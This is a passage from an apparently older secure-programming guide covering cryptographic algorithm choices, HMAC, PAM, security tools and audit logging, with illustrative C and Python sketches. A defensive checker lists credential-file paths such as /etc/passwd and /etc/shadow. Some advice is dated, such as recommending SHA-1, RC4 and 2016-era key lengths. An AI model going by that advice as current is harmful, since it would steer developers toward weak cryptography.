the ROT (rotation)
scheme, Vigenere ciphers, and so on - these can be trivially broken
with today's computers.
Don't use ``double DES'' (using DES twice) - that's subject to a
``meet in the middle'' attack that leaves it little stronger than
single DES; triple-DES holds up far better.
Your protocol should support multiple encryption algorithms, anyway;
that way, when an encryption algorithm is broken,
users can switch to another one.
</para>

<para>
For symmetric-key encryption (e.g., for bulk encryption), don't use a
key length less than 90 bits if you want the information
to stay secret through 2016
(add another bit for every additional 18 months of security) [Blaze 1996].
For encrypting worthless data, the old DES algorithm has some value,
but with modern hardware it's too easy to break DES's 56-bit key using
brute force.
If you're using DES, don't just use the ASCII text key as the key -
parity is in the least (not most) significant bit, so most DES algorithms
will encrypt using a key value well-known to adversaries;
instead, create a hash of the key and set the parity bits correctly
(and pay attention to error reports from your encryption routine).
So-called ``exportable'' encryption algorithms only have effective key lengths
of 40 bits, and are essentially worthless;
in 1996 an attacker could spend $10,000 to break such keys in twelve minutes
or use idle computer time to break them in a few days,
with the time-to-break halving every 18 months in either case.
</para>
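
<para>
The rule of thumb above (90 bits through 2016, plus one bit per
additional 18 months) is easy to turn into arithmetic.
This is only a sketch of that rule; the function name is mine, and
rounding partial 18-month periods up is my assumption.
<programlisting><![CDATA[
```c
/* Minimum symmetric key length, in bits, for data that must stay
   secret through target_year: 90 bits through 2016, plus one bit
   for every additional 18 months (partial periods rounded up). */
int min_symmetric_key_bits(int target_year)
{
    int months;

    if (target_year <= 2016)
        return 90;
    months = (target_year - 2016) * 12;
    return 90 + (months + 17) / 18;
}
```
]]></programlisting>
For example, data that must stay secret through 2046 is 360 months past
2016, which adds 20 bits for a minimum of 110.
Treat the result as a lower bound, not a recommendation.
</para>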

<para>
Block encryption algorithms can be used in a number of different modes, such as
``electronic code book'' (ECB) and ``cipher block chaining'' (CBC).
In nearly all cases, use CBC, and do <emphasis>not</emphasis> use ECB mode -
in ECB mode, the same block of data always returns the same result inside
a stream, and this is often enough to reveal what's encrypted.
Many modes, including CBC mode, require an ``initialization vector'' (IV).
The IV doesn't need to be secret, but it does need to be unpredictable by
an attacker.
Don't reuse IV's across sessions - use a new IV each time you start a session.
</para>
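
<para>
The difference between ECB and CBC is easy to see in code.
The sketch below uses a TOY 32-bit ``cipher'' that I made up purely so
the example is self-contained; it is not secure and merely stands in for
a real block cipher such as AES or triple-DES.
<programlisting><![CDATA[
```c
#include <stdint.h>
#include <stddef.h>

/* TOY block "cipher" for illustration only.  It is NOT secure. */
static uint32_t toy_encrypt_block(uint32_t key, uint32_t block)
{
    uint32_t x = block ^ key;
    x = (x << 7) | (x >> 25);    /* rotate left by 7 bits */
    return x * 2654435761u;      /* odd multiplier: still invertible */
}

/* ECB: every block is encrypted independently, so equal plaintext
   blocks always produce equal ciphertext blocks. */
void ecb_encrypt(uint32_t key, const uint32_t *in, uint32_t *out, size_t n)
{
    size_t i;
    for (i = 0; i < n; i++)
        out[i] = toy_encrypt_block(key, in[i]);
}

/* CBC: each plaintext block is XORed with the previous ciphertext
   block (the IV for the first block) before being encrypted. */
void cbc_encrypt(uint32_t key, uint32_t iv,
                 const uint32_t *in, uint32_t *out, size_t n)
{
    uint32_t prev = iv;
    size_t i;
    for (i = 0; i < n; i++) {
        out[i] = toy_encrypt_block(key, in[i] ^ prev);
        prev = out[i];
    }
}
```
]]></programlisting>
Encrypting three identical plaintext blocks with ecb_encrypt() yields
three identical ciphertext blocks, which is exactly the leak described
above; cbc_encrypt() chains each block to the one before it, so the
repetition no longer shows through.
</para>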

<para>
There are a number of different streaming encryption algorithms, but
many of them have patent restrictions.
I know of no patent or technical issues with WAKE.
RC4 was a trade secret of RSA Data Security Inc; it's been leaked since,
and I know of no real legal impediment to its use, but RSA Data
Security has often threatened
court action against users of it (it's not at all clear what RSA Data
Security could do,
but no doubt they could tie up users in worthless court cases).
If you use RC4, use it as intended - in particular, always discard the
first 256 bytes it generates, or you'll be vulnerable to attack.
<!-- Fluhrer, Mantin, Shamir discuss attacks if 256 bytes not dropped -->
SEAL is patented by IBM - so don't use it.
SOBER is patented; the patent owner has claimed that it will allow many
uses for free if permission is requested, but this creates an impediment for
later use.
Even more interestingly, block encryption algorithms can be used in modes that
turn them into stream ciphers, and users who want stream ciphers should
consider this approach (you'll be able to choose between far more
publicly-available algorithms).
</para>
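
<para>
Here is a minimal sketch of RC4 with the initial keystream discarded,
as recommended above.
The structure and function names are my own; the drop count is a
parameter so the caller can pass 256.
The code assumes 8-bit bytes.
<programlisting><![CDATA[
```c
#include <stddef.h>

struct rc4_state {
    unsigned char s[256];
    unsigned char i, j;
};

/* Produce the next keystream byte. */
static unsigned char rc4_byte(struct rc4_state *st)
{
    unsigned char tmp;

    st->i = (unsigned char)(st->i + 1);
    st->j = (unsigned char)(st->j + st->s[st->i]);
    tmp = st->s[st->i];
    st->s[st->i] = st->s[st->j];
    st->s[st->j] = tmp;
    return st->s[(unsigned char)(st->s[st->i] + st->s[st->j])];
}

/* Key setup, then discard the first `drop` keystream bytes
   (pass 256 to follow the advice in the text). */
void rc4_init(struct rc4_state *st, const unsigned char *key,
              size_t keylen, size_t drop)
{
    unsigned int i;
    unsigned char j = 0, tmp;

    for (i = 0; i < 256; i++)
        st->s[i] = (unsigned char)i;
    for (i = 0; i < 256; i++) {
        j = (unsigned char)(j + st->s[i] + key[i % keylen]);
        tmp = st->s[i];
        st->s[i] = st->s[j];
        st->s[j] = tmp;
    }
    st->i = 0;
    st->j = 0;
    while (drop--)
        (void)rc4_byte(st);
}

/* Encrypt or decrypt (the operation is the same) n bytes. */
void rc4_crypt(struct rc4_state *st, const unsigned char *in,
               unsigned char *out, size_t n)
{
    size_t k;
    for (k = 0; k < n; k++)
        out[k] = in[k] ^ rc4_byte(st);
}
```
]]></programlisting>
Both ends must discard the same number of bytes, or decryption will
produce garbage.
</para>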

</sect2>


<sect2 id="public-key-encryption">
<title>Public Key Algorithms</title>

<para>
For public key cryptography (used, among other things, for
signing and sending secret keys), there are only a few
widely-deployed algorithms.
One of the most widely-used algorithms is RSA;
RSA's algorithm was patented, but only in the U.S., and that patent
expired in September 2000, so RSA can be freely used.
Never decrypt or sign a raw value that an attacker gives you directly using
RSA and expose the result, because that could expose the private key
(this isn't a problem in practice, because most protocols involve
signing a hash computed by the user - not the raw value - or don't expose
the result).
Never decrypt or sign the exact same raw value multiple times
(the original can be exposed).
Both of these can be solved by always adding random padding
(PGP does this) - the usual approach is called
Optimal Asymmetric Encryption Padding (OAEP).
</para>

<para>
The Diffie-Hellman key exchange algorithm is widely used to permit
two parties to agree on a session key.  By itself it doesn't guarantee that
the parties are who they say they are, or that there is no middleman, but
it does strongly help defend against passive listeners; its patent
expired in 1997.
If you use Diffie-Hellman to create a shared secret, be sure to hash it first
(there's an attack if you use its shared value directly).
</para>
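
<para>
The arithmetic behind Diffie-Hellman can be sketched with toy numbers.
The function names below are my own, and the tiny modulus is only for
illustration; real use needs a modulus of 1024 bits or more, a
big-number library, and (as noted above) a hash of the shared value
before it is used as a key.
<programlisting><![CDATA[
```c
#include <stdint.h>

/* (base^exp) mod m by square-and-multiply.  Free of overflow only
   while m is below 2^32, so this is strictly a toy. */
uint64_t mod_pow(uint64_t base, uint64_t exp, uint64_t m)
{
    uint64_t result = 1 % m;

    base %= m;
    while (exp > 0) {
        if (exp & 1)
            result = (result * base) % m;
        base = (base * base) % m;
        exp >>= 1;
    }
    return result;
}

/* Each party publishes g^secret mod p ... */
uint64_t dh_public(uint64_t g, uint64_t p, uint64_t secret)
{
    return mod_pow(g, secret, p);
}

/* ... and raises the peer's public value to its own secret.
   Both sides arrive at the same number. */
uint64_t dh_shared(uint64_t peer_public, uint64_t p, uint64_t secret)
{
    return mod_pow(peer_public, secret, p);
}
```
]]></programlisting>
With p=23 and g=5, secrets 4 and 3 give public values 4 and 10, and
both parties compute the shared value 18.
Nothing here authenticates either party, which is why the exchange
alone does not stop a middleman.
</para>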

<para>
NIST developed the digital signature standard (DSS) (it's a
modification of the ElGamal cryptosystem) for digital signature
generation and verification; one of the conditions for its development
was for it to be patent-free.
</para>

<para>
RSA, Diffie-Hellman, and ElGamal techniques require more bits for the
keys for equivalent security compared to typical symmetric keys;
a 1024-bit key in these systems is supposed to be roughly equivalent
to an 80-bit symmetric key.
A 512-bit RSA key is considered completely unsafe;
Nicko van Someren has demonstrated that such small RSA keys
can be factored in 6 weeks using only already-available office hardware
(never mind equipment designed for the job).
<!-- http://www.mail-archive.com/cryptography%40wasabisystems.com/msg01950.html -->
In the past, a 1024-bit RSA key was considered reasonably secure, but
recent advancements in factorization algorithms
(e.g., by D. J. Bernstein) have raised concerns that perhaps even 1024 bits
is not enough for an RSA key.
Certainly, if your application needs to be highly secure or last beyond
2015, you should use 2048-bit keys.
<!--
"1024-bit RSA keys in danger of compromise" by
"Lucky Green" <shamrock@cypherpunks.to>, Bugtraq, 23 March 2002.
D.J. Bernstein paper http://cr.yp.to/papers/nfscircuit.ps
Bruce Schneier doubts it, see
 http://www.counterpane.com/crypto-gram-0203.html#6
-->
</para>

<para>
If you need a public key that requires far fewer bits (e.g., for
a smartcard), then you might use elliptic
curve cryptography (IEEE P1363 has some suggested curves; finding curves
is hard).
However, be careful - elliptic curve cryptography isn't patented, but
certain speedup techniques are patented.
Elliptic curve cryptography is fast enough
that it really doesn't need these speedups anyway for its usual use of
encrypting session / bulk encryption keys.
In general, you shouldn't try to do bulk encryption with elliptic keys;
symmetric algorithms are much faster and are better-tested for the job.
</para>

</sect2>

<sect2 id="hash">
<title>Cryptographic Hash Algorithms</title>

<para>
Some programs need a one-way cryptographic hash algorithm, that is, a function
that takes an ``arbitrary'' amount of data and generates a fixed-length
number that is hard for an attacker
to invert (e.g., it's difficult for an attacker to
create a different set of data to generate that same value).
For a number of years MD5 has been a favorite, but recent efforts have
shown that its 128-bit length may not be enough
[van Oorschot 1994]
and that certain attacks weaken MD5's protection
[Dobbertin 1996].
Indeed, there are rumors
that a top industry cryptographer has broken MD5, but is bound by
employee agreement to keep silent
(see the Bugtraq 22 August 2000 posting by John Viega).
Anyone can create a rumor, but enough weaknesses have been found that
the idea of completing the break is plausible.
If you're writing new code, use SHA-1 instead of MD5.
Don't use the original SHA (now called ``SHA-0'');
SHA-0 had the same weakness that MD5 does.
If you need more bits in your hash algorithm, use SHA-256, SHA-384, or
SHA-512; you can get the specifications in NIST FIPS PUB 180-2.
</para>
</sect2>

<sect2 id="integrity-check">
<title>Integrity Checking</title>

<para>
When communicating, you need some sort of integrity check (don't depend
just on encryption, since an attacker can then induce changes of information
to ``random'' values).
This can be done with hash algorithms, but don't just use a hash function
directly (this exposes users to an ``extension'' attack - the attacker
can use the hash value, add data of their choosing, and compute the new hash).
The usual approach is ``HMAC'', which computes the integrity check as
<programlisting>
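  H(k xor opad, H(k xor ipad, data))
</programlisting>
where H is the hash function (typically MD5 or SHA-1), k is the key
(padded to the hash's block size), the comma denotes concatenation,
and ipad and opad are fixed padding constants.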
Thus, integrity checks are often HMAC-MD5 or HMAC-SHA-1.
Note that although MD5 has some weaknesses, as far as I know MD5 isn't
vulnerable when used in this construct, so HMAC-MD5 is (to my knowledge) okay.
This is defined in detail in IETF RFC 2104.
</para>

<para>
Note that in the HMAC approach, a receiver can forge the same data as a sender.
This isn't usually a problem, but if this must be avoided, then use
public key methods and have the sender ``sign'' the data with the sender's
private key - this avoids this forging attack, but it's more expensive and
for most environments isn't necessary.
</para>

</sect2>

<sect2 id="rmac">
<title>Randomized Message Authentication Mode (RMAC)</title>

<para>
<ulink url="http://csrc.nist.gov/CryptoToolkit/modes">
NIST has developed and proposed
a new mode</ulink> for using cryptographic algorithms called
<ulink url="http://www.counterpane.com/crypto-gram-0301.html">
Randomized Message Authentication Code (RMAC)</ulink>.
RMAC is intended for use as a message authentication code technique.
</para>

<para>
Although there's a formal proof showing that RMAC is secure, the
proof depends on the highly questionable assumption that
the underlying cryptographic algorithm
meets the "ideal cipher model" - in particular, that the algorithm is
secure against a variety of specialized attacks, including related-key attacks.
Unfortunately, related-key attacks are poorly studied for many algorithms;
this is not the kind of property or attack that most people worry about
when analyzing cryptographic algorithms.
It's known that triple-DES doesn't have this property, and it's unclear if
other widely-accepted algorithms like AES have this property
(it appears that AES is at least weaker against related-key attacks than
usual attacks).
</para>

<para>
The best advice right now is "don't use RMAC".
There are other ways to do message authentication, such as HMAC
combined with a cryptographic hash algorithm (e.g., HMAC-SHA1).
HMAC isn't the same thing (e.g., technically it doesn't include a
nonce, so you should rekey sooner), but the theoretical weaknesses
of HMAC are merely theoretical, while the problems in RMAC seem far
more important in the real world.
</para>
</sect2>

<sect2 id="crypto-other">
<title>Other Cryptographic Issues</title>

<para>
You should both encrypt and include integrity checks of data that's important.
Don't depend on the encryption also providing integrity - an attacker may
be able to change the bits into a different value, and although the attacker
may not be able to change it to a specific value, merely changing the
value may be enough.
In general, you should use different keys for integrity and secrecy, to
avoid certain subtle attacks.
</para>

<para>
One issue not discussed often enough is the problem of ``traffic analysis.''
That is, even if messages are encrypted and the encryption is not broken,
an adversary may learn a great deal just from the encrypted messages.
For example, if the presidents of two companies start exchanging many
encrypted email messages, it may suggest that the two companies are
considering a merger.
For another example, many SSH implementations have been found to have a
weakness in exchanging passwords: observers could look at packets and
determine the length (or length range) of the password, even if they
couldn't determine the password itself.
They could also determine other information about the password that
significantly aided in breaking it.
<!-- http://lwn.net/2001/0322/a/ssh-analysis.php3 -->
</para>

<para>
Be sure to not make it possible to solve a problem in parts, and use
different keys when the trust environment (who is trusted) changes.
Don't use the same key for too long - after a while, change the session key
or password so an adversary will have to start over.
</para>

<para>
Generally you should compress something you'll encrypt - this does
add a fixed header, which isn't so good, but it eliminates many
patterns in the rest of the message as well as making the result
smaller, so it's usually viewed as a ``win'' if compression is likely
to make the result smaller.
</para>

<para>
In a related note, if you must create your own communication
protocol, examine the problems of what's gone on before.
Classics such as Bellovin [1989]'s review of security problems
in the TCP/IP protocol suite might help you, as well as
Bruce Schneier [1998]
and Mudge's breaking of Microsoft's PPTP implementation and their
follow-on work.
Again, be sure to give any new protocol widespread public review, and
reuse what you can.
</para>
</sect2>

</sect1>


<sect1 id="use-pam">
<title>Using PAM</title>

<para>
Pluggable Authentication Modules (PAM) is
a flexible mechanism for authenticating users.
Many Unix-like systems support PAM, including
Solaris, nearly all Linux distributions
(e.g., Red Hat Linux, Caldera, and Debian as of version 2.2),
and FreeBSD as of version 3.1.
By using PAM, your program can be independent of the
authentication scheme (passwords, SmartCards, etc.).
Basically, your program calls PAM, which at run-time determines
which ``authentication modules'' are required by checking the configuration
set by the local system administrator.
If you're writing a program that requires authentication (e.g., entering
a password), you should include support for PAM.
You can find out more about the Linux-PAM project at
<ulink
url="http://www.kernel.org/pub/linux/libs/pam/index.html">http://www.kernel.org/pub/linux/libs/pam/index.html</ulink>.
</para>

</sect1>


<sect1 id="tools">
<title>Tools</title>

<para>
Some tools may help you detect security problems before
you field the result.
They can't find all such problems, of course, but they can help
catch problems that would otherwise slip by.
Here are a few tools, emphasizing open source / free software tools.
</para>

<para>
One obvious type of tool is a program to examine the source code
to search for patterns of known potential security problems
(e.g., calls to library functions in ways that are often the source
of security vulnerabilities).
These kinds of programs are called ``source code scanners''.
Here are a few such tools:
<itemizedlist>
<listitem><para>
Flawfinder, which I've developed; it's available at
<ulink url="http://www.dwheeler.com/flawfinder">http://www.dwheeler.com/flawfinder</ulink>.
Like RATS (described next), this program scans C/C++ source code for
common problems and is licensed under the GPL.
Unlike RATS, flawfinder is implemented in Python.
The developers of RATS and Flawfinder have agreed to find a way to
work together to create a single ``best of breed'' open source program.
</para></listitem>
<listitem><para>
RATS (Rough Auditing Tool for Security)
from Secure Software Solutions is available at
<ulink url="http://www.securesw.com/rats">http://www.securesw.com/rats</ulink>.
This program scans C/C++ source code for common problems, and
is licensed under the GPL.
</para></listitem>
<listitem><para>
ITS4 from Cigital (formerly Reliable Software Technologies, RST)
also statically checks C/C++ code.
It is available free for non-commercial use, including its source code
and with certain modification and redistribution rights.
Note that this isn't released as ``open source'' as defined by the
<ulink url="http://www.opensource.org/osd.html">Open
Source Definition</ulink> (OSD);
in particular, OSD point 6 forbids
``non-commercial use only'' clauses in open source licenses.
ITS4 is available at
<ulink url="http://www.rstcorp.com/its4">http://www.rstcorp.com/its4</ulink>.
</para></listitem>
<listitem><para>
Splint (formerly named LCLint) is a tool for statically checking C programs.
With minimal effort, splint can be used as a better lint.
If additional effort is invested adding annotations to programs,
splint can perform stronger checking than can be done by any standard lint.
For example, it can be used to statically detect likely buffer overflows.
The software is licensed under the GPL and is available at
<ulink url="http://www.splint.org">http://www.splint.org</ulink>.
<!-- <ulink url="http://lclint.cs.virginia.edu">http://lclint.cs.virginia.edu</ulink>.
-->
</para></listitem>
<listitem><para>
cqual is a type-based analysis tool for finding bugs in C programs. cqual
extends the type system of C with extra user-defined type qualifiers,
e.g., it can note that values are ``tainted'' or ``untainted''
(similar to Perl's taint checking). The
programmer annotates their program in a few places, and cqual performs
qualifier inference to check whether the annotations are correct. cqual
presents the analysis results using Program Analysis Mode, an emacs-based
interface.
The current version of cqual can detect potential format-string
vulnerabilities in C programs.
A previous incarnation of cqual, Carillon,
has been used to find Y2K bugs in C programs.
The software is licensed under the GPL and is available from
<ulink url="http://www.cs.berkeley.edu/Research/Aiken/cqual">http://www.cs.berkeley.edu/Research/Aiken/cqual</ulink>.
</para></listitem>

<listitem><para>
Cyclone is a C-like language intended to remove C's security weaknesses.
In theory, you can always switch to a language that is ``more secure,''
but this doesn't always help (a language can help you avoid common mistakes
but it can't read your mind).
<ulink url="http://www.securityfocus.com/guest/9094">John Viega has
reviewed Cyclone</ulink>, and in December 2001 he said:
``Cyclone is definitely a neat language.
It's a C dialect that doesn't feel like it's taking away any power,
yet adds strong safety guarantees, along with numerous features that
can be a real boon to programmers.
Unfortunately, Cyclone isn't yet ready for prime time.
Even with crippling limitations aside, it doesn't yet offer
enough advantages over Java (or even C with a good set of tools)
to make it worth the risk of using what is still a very young technology.
Perhaps in a few years, Cyclone will mature into a robust,
widely supported language that comes dangerously
close to C in terms of efficiency.
If that day comes, you'll certainly see me abandoning C for good.''
The Cyclone compiler has been released under the GPL and LGPL.
You can get more information from the
<ulink url="http://www.research.att.com/projects/cyclone">
Cyclone web site</ulink>.
</para></listitem>
</itemizedlist>
</para>
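<para>
To make the idea of a source code scanner concrete, here is a toy Python
sketch that looks for calls to a handful of C library functions that are
often misused.
The rule list and the names RISKY_CALLS and scan_source are assumptions made
for this illustration; this is not how any of the tools above is implemented,
and real scanners use far larger rule sets and smarter parsing.
</para>
<programlisting>
```python
import re

# A tiny, assumed rule set; real scanners carry much larger databases.
RISKY_CALLS = ("gets", "strcpy", "strcat", "sprintf", "system")

# Match a risky name as a whole word, followed by an opening parenthesis.
PATTERN = re.compile(r"\b(" + "|".join(RISKY_CALLS) + r")\s*\(")


def scan_source(text: str):
    """Return (line number, function name) for each risky-looking call."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        for match in PATTERN.finditer(line):
            hits.append((number, match.group(1)))
    return hits
```
</programlisting>
<para>
A pattern matcher like this knows nothing about comments, strings, or how the
arguments are used, so it reports both false alarms and misses; its output is
a list of places for a person to look at, not a verdict.
</para>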

<para>
Some tools try to detect potential security flaws at run-time,
either to counter them or at least to warn the developer about them.
Much of Crispin Cowan's work, such as StackGuard, fits here.
</para>

<para>
There are several tools that try to detect various C/C++ memory-management
problems; these are really general-purpose software quality improvement
tools, and not specific to security, but memory management problems
can definitely cause security problems.
An especially capable tool is
<ulink url="http://developer.kde.org/~sewardj">Valgrind</ulink>,
which detects various memory-management problems
(such as use of uninitialized memory, reading/writing memory after it's been
free'd, reading/writing off the end of malloc'ed blocks,
and memory leaks).
Another such tool is Electric Fence (efence) by Bruce Perens, which can
detect certain memory management errors.
<ulink url="http://www.linkdata.se/sourcecode.html">Memwatch</ulink>
(public domain) and
<ulink url="http://odin.ac.hmc.edu/~neldredge/yamd/">YAMD</ulink> (GPL)
can detect memory allocation problems for C and C++.
You can even use the built-in capabilities of the
GNU C library's malloc library, which has the
MALLOC_CHECK_ environment variable (see its manual page for more information).
There are many others.
</para>


<para>
Another approach is to create test patterns and run the program,
in an attempt to find weaknesses in the program.
Here are a few such tools:
<itemizedlist>
<listitem><para>
BFBTester, the Brute Force Binary Tester, is licensed under the GPL.
This program does quick security checks of binary programs.
BFBTester performs checks of single and multiple argument
command line overflows and environment variable overflows.
Version 2.0 and higher can also watch for tempfile creation activity
(to check for using unsafe tempfile names).
At one time BFBTester didn't run on Linux (due to
a technical issue in Linux's POSIX threads implementation), but this
has been fixed as of version 2.0.1.
More information is available at
<ulink url="http://bfbtester.sourceforge.net/">http://bfbtester.sourceforge.net/</ulink>.
</para></listitem>

<listitem><para>
The
<ulink url="http://fuzz.sourceforge.net">fuzz</ulink>
program
is a tool for testing other software.
It tests programs by bombarding the program being evaluated with random data.
This tool isn't really specific to security.
</para></listitem>

<listitem><para>
<ulink url="http://www.immunitysec.com/spike.html">SPIKE</ulink>
is a "fuzzer creation kit", i.e., it's a toolkit designed to
create "random" tests to find security problems.
The SPIKE toolkit is particularly designed for protocol analysis by
simulating network protocol clients, and SPIKE proXy is a tool built on
SPIKE to test web applications.
SPIKE includes a few pre-canned tests.
SPIKE is licensed under the GPL.
</para></listitem>

</itemizedlist>
</para>
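<para>
The ``bombard it with random data'' approach can be sketched in a few lines
of Python.
Everything here is hypothetical: fuzz is a made-up harness, parse_record is a
deliberately buggy stand-in for the code under test, and the sketch assumes
that ValueError is the target's normal way of rejecting bad input.
It is not a description of how the tools listed above work internally.
</para>
<programlisting>
```python
import random


def fuzz(target, runs=200, max_len=64, seed=0):
    """Call target() on random byte strings; collect inputs that crash it.

    "Crash" here means any exception other than ValueError, which this
    sketch (by assumption) treats as a clean rejection of bad input.
    """
    rng = random.Random(seed)  # fixed seed so failures are reproducible
    failures = []
    for _ in range(runs):
        length = rng.randint(0, max_len)
        data = bytes(rng.randint(0, 255) for _ in range(length))
        try:
            target(data)
        except ValueError:
            pass  # a clean rejection is the desired behaviour
        except Exception as exc:
            failures.append((data, exc))
    return failures


def parse_record(data: bytes) -> int:
    """Hypothetical target with a bug: it trusts a length byte."""
    if not data:
        raise ValueError("empty record")
    declared = data[0]
    payload = data[1:]
    # Bug: declared is never checked against len(payload).
    return payload[declared - 1] if declared else 0
```
</programlisting>
<para>
Calling fuzz(parse_record) returns the inputs that triggered an unexpected
exception, together with the exception itself, so each failure can be
replayed and investigated.
</para>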

<para>
There are a number of tools that try to give you insight into running
programs that can also be useful when trying to find security problems
in your code.
This includes symbolic debuggers (such as gdb) and trace programs
(such as strace and ltrace).
One interesting program to support analysis of running code is
<ulink url="http://razor.bindview.com/tools/fenris">
Fenris</ulink> (GPL license).
Its documentation describes Fenris as a
``multipurpose tracer, stateful analyzer and partial decompiler
intended to simplify bug tracking,
security audits, code, algorithm or protocol analysis -
providing a structural program trace, general information
about internal constructions, execution path,
memory operations, I/O, conditional expressions and much more.''
Fenris actually supplies a whole suite of tools, including
extensive forensics capabilities and
<ulink url="http://lcamtuf.coredump.cx/fdesk.jpg">a
nice debugging GUI for Linux</ulink>.
A list of other promising open source tools that can be suitable
for debugging or code analysis is available at
<!-- was: http://lcamtuf.coredump.cx/fenris/other.txt -->
<ulink url="http://lcamtuf.coredump.cx/fenris/debug-tools.html">
http://lcamtuf.coredump.cx/fenris/debug-tools.html</ulink>.
Another interesting program along these lines is Subterfugue,
which allows you to control what happens in every system call made
by a program.
</para>

<para>
If you're building a common kind of product where many standard
potential flaws exist (like an ftp server or firewall), you might
find standard security scanning tools useful.
One good one is
<ulink url="http://www.nessus.org">Nessus</ulink>; there are many others.
These kinds of tools are very useful for doing regression testing,
but since they essentially use a list of past specific vulnerabilities
and common configuration errors,
they may not be very helpful in finding problems in new programs.
</para>

<para>
Often, you'll need to call on other tools to implement your secure
infrastructure.
The
<ulink url="http://ospkibook.sourceforge.net">
Open-Source PKI Book</ulink>
describes a number of open source programs for
implementing a public key infrastructure (PKI).
</para>

<para>
Of course, running a ``secure'' program on an insecure platform
configuration makes little sense.
You may want to examine hardening systems, which attempt to configure
or modify systems to be more resistant to attacks.
For Linux, one hardening system is
Bastille Linux, available at
<ulink url="http://www.bastille-linux.org">http://www.bastille-linux.org</ulink>.
</para>


</sect1>
<sect1 id="windows-ce">
<title>Windows CE</title>

<para>
If you're securing a Windows CE Device, you should read
Maricia Alforque's
"Creating a Secure Windows CE Device" at
<ulink url="http://msdn.microsoft.com/library/techart/winsecurity.htm">http://msdn.microsoft.com/library/techart/winsecurity.htm</ulink>.
</para>
</sect1>

<sect1 id="write-audit-records">
<title>Write Audit Records</title>

<para>
Write audit logs for program startup, session startup, and
for suspicious activity.
Possible information of value includes date, time, uid, euid, gid, egid,
terminal information, process id, and command line values.
You may find the function syslog(3) helpful for implementing audit logs.
One awkward problem is that any logging system should be able to record
a lot of information (since this information could be very helpful), yet
if the information isn't handled carefully the information itself could be
used to create an attack.
After all, the attacker controls some of the input being sent to the program.
When recording data sent by a possible attacker,
identify a list of ``expected'' characters and
escape any ``unexpected'' characters so that the log isn't corrupted.
Not doing this can be a real problem; users may include characters
such as control characters (especially NIL or end-of-line) that
can cause real problems.
For example, if an attacker embeds a newline, they can then forge
log entries by following the newline with the desired log entry.
Sadly, there doesn't seem to be a standard convention for escaping these
characters.
I'm partial to the URL escaping mechanism
(%hh where hh is the hexadecimal value of the escaped byte) but there
are others including the C convention (\ooo for the octal value and \X
where X is a special symbol, e.g., \n for newline).
There's also the caret-system (^I is control-I), though that doesn't
handle byte values over 127 gracefully.
</para>
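<para>
Here is a minimal Python sketch of the URL-style escaping described above.
The set of ``expected'' characters is an assumption chosen for illustration
and should be adapted to your own log format; note that '%' itself is left
out of the set, so the escaped form stays unambiguous.
The name escape_for_log is made up for this example.
</para>
<programlisting>
```python
import string

# Characters allowed through unescaped: an assumed "expected" set.
# '%' is deliberately excluded so that escaped output is unambiguous.
EXPECTED = set(string.ascii_letters + string.digits + " .,:;/_-=@")


def escape_for_log(data: bytes) -> str:
    """Escape every unexpected byte as %hh (two hexadecimal digits)."""
    out = []
    for byte in data:
        ch = chr(byte)
        if ch in EXPECTED:
            out.append(ch)
        else:
            out.append("%{:02X}".format(byte))
    return "".join(out)
```
</programlisting>
<para>
With this in place, an embedded newline arrives in the log as %0A, so it can
no longer start a forged entry.
The escaped string can then be handed to a logging call such as Python's
syslog.syslog().
</para>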

<para>
There is the danger that a user could create a denial-of-service attack
(or at least stop auditing)
by performing a very large number of events that cut an audit record until
the system runs out of resources to store the records.
One approach to counter this threat is to rate-limit audit record
recording; intentionally slow down the response rate
if ``too many'' audit records are being cut.
You could try to slow the response rate only to the suspected attacker,
but in many
situations a single attacker can masquerade as potentially many users.
</para>
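<para>
One possible shape for such rate limiting, sketched in Python under assumed
parameters: count the audit records cut in a sliding time window and, once
the count exceeds a threshold, return a delay that the caller applies before
responding.
The class name, the thresholds, and the linear penalty are all illustrative
choices, not a recommendation.
</para>
<programlisting>
```python
import time


class AuditRateLimiter:
    """Suggest a response delay when audit records are cut too quickly."""

    def __init__(self, max_records=100, window=60.0, penalty=1.0,
                 clock=time.monotonic):
        self.max_records = max_records  # records tolerated per window
        self.window = window            # window length in seconds
        self.penalty = penalty          # extra delay per excess record
        self.clock = clock              # injectable so it can be tested
        self.stamps = []                # times of recent audit records

    def record(self):
        """Note one audit record; return seconds to delay the response."""
        now = self.clock()
        cutoff = now - self.window
        # Forget records that have fallen out of the window.
        self.stamps = [t for t in self.stamps if t > cutoff]
        self.stamps.append(now)
        excess = len(self.stamps) - self.max_records
        return self.penalty * excess if excess > 0 else 0.0
```
</programlisting>
<para>
A caller would do something like time.sleep(limiter.record()) after writing
each audit record.
Because the limiter is global rather than per user, it does not depend on
being able to tell one attacker from many.
</para>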

<para>
Selecting what is ``suspicious activity'' is, of course, dependent on
what the program does and its anticipated use.
Any input that fails the filtering checks discussed earlier is
certainly a candidate (e.g., containing NIL).
Inputs that could not result from normal use should probably be logged,
e.g., a CGI program where certain required fields are missing
in suspicious ways.
Any input with phrases like /etc/passwd or /etc/shadow
or the like is very suspicious in many cases.
Similarly, trying to access Windows ``registry'' files or .pwl files
is very suspicious.
</para>
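<para>
As a hedged sketch of how such checks might be collected in one place, the
following Python function returns the reasons (if any) why a set of input
fields deserves an audit record.
The phrase list, the function name, and the idea of passing fields as a
dictionary of byte strings are assumptions for this example; what counts as
suspicious depends on your program.
</para>
<programlisting>
```python
# Assumed examples of phrases that are rarely legitimate in input.
SUSPICIOUS_PHRASES = (b"/etc/passwd", b"/etc/shadow", b".pwl")


def suspicious_reasons(fields: dict, required=()):
    """Return a list of reasons why this input deserves an audit record.

    fields maps field names (chosen by the application) to raw byte values.
    """
    reasons = []
    for name in required:
        if name not in fields:
            reasons.append("missing required field: " + name)
    for name, value in fields.items():
        if b"\x00" in value:
            reasons.append("NIL byte in field: " + name)
        lowered = value.lower()
        for phrase in SUSPICIOUS_PHRASES:
            if phrase in lowered:
                reasons.append("suspicious phrase in field: " + name)
                break
    return reasons
```
</programlisting>
<para>
An empty list means nothing was flagged.
If field names can themselves come from the user, escape them before writing
them to the log, just like any other attacker-supplied data.
</para>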

<para>
Do not record passwords in an audit record.
Often people accidentally enter passwords for a different system,
so recording a password may allow a system administrator to break into a
different computer outside the administrator's domain.
</para>
</sect1>

<sect1 id="physical-emissions">
<title>Physical Emissions</title>
<para>
Although it's really outside the scope of this book, it's
important to remember that computing and communications equipment leaks a lot of
information, which makes it hard to really secure.
Many people are aware of TEMPEST requirements which deal with
radio frequency emissions of computers, displays, keyboards, and other
components which can be eavesdropped.
The light from displays can also be eavesdropped, even if it's bounced off an
office wall at great distance
[Kuhn 2002].
